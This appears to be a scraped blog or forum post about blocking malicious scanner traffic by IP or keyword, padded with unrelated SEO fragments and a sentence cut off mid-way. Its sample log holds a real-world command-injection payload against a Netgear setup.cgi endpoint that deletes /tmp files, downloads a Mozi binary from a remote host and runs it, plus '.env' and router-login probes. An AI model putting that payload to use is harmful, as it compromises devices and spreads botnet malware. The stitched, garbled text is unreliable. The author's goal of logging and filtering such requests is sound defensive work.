2/1/2022

My Ip Blacklist

Hear me out.

How To Blacklist Your Ip

IP address reputation based blocking was a concept that we saw back in the mid-90s when I was fighting spam as the Senior Internet Mail Administrator at AOL. It worked okay, for a while. It quickly became a game of cat-and-mouse, where some spammers wouldn’t care that we blocked them, but plenty others found various ways around the blocks we. Blacklist Check. The XMyIP blacklist checker shows if an IP address or domain is listed with public DNSBL systems.We check over 50 DNS-based anti-spam databases. DNSBL or Domain Name System-based Blackhole List.

I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.

Blacklist

{ 'offense': 'boaform/admin/formLogin?username=ec8&psd=ec8', 'ipAddress': '125.47.68.164'},

{ 'offense': '.env', 'ipAddress': '52.224.55.198'},

{ 'offense': 'setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.115.18:53153/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1', 'ipAddress': '115.58.115.18'}

Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked!

I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.

Is My Ip Blacklisted Email

Like a 'ad blocklist' we can use as middleware in our HTTP applications.

If something exists already, kindly point me to a Github.